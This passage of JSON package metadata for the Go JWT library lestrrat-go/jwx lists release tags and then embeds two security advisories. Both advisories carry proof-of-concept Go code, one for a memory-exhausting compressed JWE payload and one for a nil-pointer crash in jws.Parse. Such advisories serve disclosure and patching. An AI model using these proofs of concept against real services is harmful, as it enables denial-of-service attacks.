github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-05-25T09:11:29.814Z","dependent_packages_count":1295,"downloads":null,"downloads_period":null,"dependent_repos_count":2884,"rankings":{"downloads":null,"dependent_repos_count":0.15291915825991692,"dependent_packages_count":0.10208443129427289,"stargazers_count":1.7031708420305671,"forks_count":2.2283013350312446,"docker_downloads_count":0.10924279080576155,"average":0.8591437114843525},"purl":"pkg:golang/github.com/lestrrat-go/jwx","advisories":[{"uuid":"GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","url":"https://github.com/advisories/GHSA-hj3v-m684-v259","title":"JWX vulnerable to a denial of service attack using compressed JWE message","description":"### Summary\nThis vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the recipient, it results in significant memory allocation and processing time during decompression.\n\n### Details\n\n**The attacker needs to obtain a valid public key to compress the payload**. It needs to be valid so that the recipient can use to successfully decompress the payload. Furthermore in context JWT processing in the v2 versions, the recipient must explicitly allow JWE handling .\n\nThe attacker then crafts a message with high compression ratio, e.g. a payload with very high frequency of repeating patterns that can decompress to a much larger size.  If the payload is large enough, recipient who is decompressing the data will have to allocate a large amount of memory, which then can lead to a denial of service.\n\nThe original report includes a reference to [1], but there are some very subtle differences between this library and the aforementioned issue. The most important aspect is that the referenced issue focuses on JWT processing, whereas this library is intentionally divided into parts that comprise JOSE, i.e. JWT, JWS, JWE, JWK. In particular, v2 of this library does not attempt to handle JWT payload enveloped in a JWE message automatically (v1 attempted to do this automatically, but it was never stable).\n\nReflecting this subtle difference, the approach taken to mitigate this vulnerability is slightly different from the referenced issue. The referenced issue limits the size of JWT when parsing, but the fixes for this library limits the maximum size of the decompressed data when decrypting JWE messages. Therefore the fix in this library is applicable regardless of the usage context, and a limit is now imposed on the size of the message that our JWE implementation can handle.\n\n### Proof of Concept\n\nModified from the original report to fit the vulnerability better:\n\n```go\n// The value below just needs to be \"large enough\" so that the it puts enough strain on the\n// recipient's environment. The value below is a safe size on my machine to run the test\n// without causing problems. When you increase the payload size, at some point the processing\n// will be slow enough to virtually freeze the program or cause a memory allocation error\nconst payloadSize = 1 \u003c\u003c 31\n\nprivkey, err := rsa.GenerateKey(rand.Reader, 2048)\nrequire.NoError(t, err, `rsa.GenerateKey should succeed`)\npubkey := \u0026privkey.PublicKey\npayload := strings.Repeat(\"x\", payloadSize)\n\nencrypted, err := jwe.Encrypt([]byte(payload), jwe.WithKey(jwa.RSA_OAEP, pubkey), jwe.WithContentEncryption(\"A128CBC-HS256\"), jwe.WithCompress(jwa.Deflate))\nrequire.NoError(t, err, `jwe.Encrypt should succeed`)\n_, err = jwe.Decrypt(encrypted, jwe.WithKey(jwa.RSA_OAEP, privkey)) // Will be allocating large amounts of memory\nrequire.Error(t, err, `jwe.Decrypt should fail`)\n```\n\n###  References\n\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-08T15:06:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259","https://github.com/lestrrat-go/jwx/commit/d01027d74c7376d66037a10f4f64af9af26a7e34","https://github.com/lestrrat-go/jwx/commit/d43f2ceb7f0c13714dfe8854d6439766e86faa76","https://nvd.nist.gov/vuln/detail/CVE-2024-28122","https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","https://github.com/advisories/GHSA-hj3v-m684-v259"],"source_kind":"github","identifiers":["GHSA-hj3v-m684-v259","CVE-2024-28122"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2024-03-08T16:04:55.517Z","updated_at":"2026-06-13T16:05:49.873Z","epss_percentage":0.0015,"epss_percentile":0.35548,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.29","vulnerable_version_range":"\u003c 1.2.29"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.21","vulnerable_version_range":"\u003c 2.0.21"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","url":"https://github.com/advisories/GHSA-pvcr-v8j8-j5q3","title":"Parsing JSON serialized payload without protected field can lead to segfault","description":"### Summary\n\nCalling `jws.Parse` with a JSON serialized payload where the `signature` field is present while `protected` is absent can lead to a nil pointer dereference.\n\n### Details\n\nThis seems to also affect other functions that calls `Parse` internally, like `jws.Verify`.\n\nMy understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.\n\nBased on the stack trace in the PoC, the issue seems to be that the processing done in `jws/message.go:UnmarshalJSON()` assumes that if a `signature` field is present, then a `protected` field is also present. If this is not the case, then the subsequent call to `getB64Value(sig.protected)` will dereference `sig.protected`, which is `nil`.\n\n### PoC\n\nReproducer:\n\n```go\npackage poc\n\nimport (\n        \"testing\"\n\n        \"github.com/lestrrat-go/jwx/v2/jws\"\n)\n\nfunc TestPOC(t *testing.T) {\n        _, _ = jws.Parse([]byte(`{\"signature\": \"\"}`))\n}\n```\n\nResult:\n\n```\n$ go test        \n--- FAIL: TestPOC (0.00s)\npanic: runtime error: invalid memory address or nil pointer dereference [recovered]\n        panic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]\n\ngoroutine 6 [running]:\ntesting.tRunner.func1.2({0x628800, 0x831030})\n        /usr/local/go/src/testing/testing.go:1545 +0x238\ntesting.tRunner.func1()\n        /usr/local/go/src/testing/testing.go:1548 +0x397\npanic({0x628800?, 0x831030?})\n        /usr/local/go/src/runtime/panic.go:914 +0x21f\ngithub.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:484 +0x18\ngithub.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/message.go:323 +0x4ad\nencoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})\n        /usr/local/go/src/encoding/json/decode.go:604 +0x6cc\nencoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})\n        /usr/local/go/src/encoding/json/decode.go:374 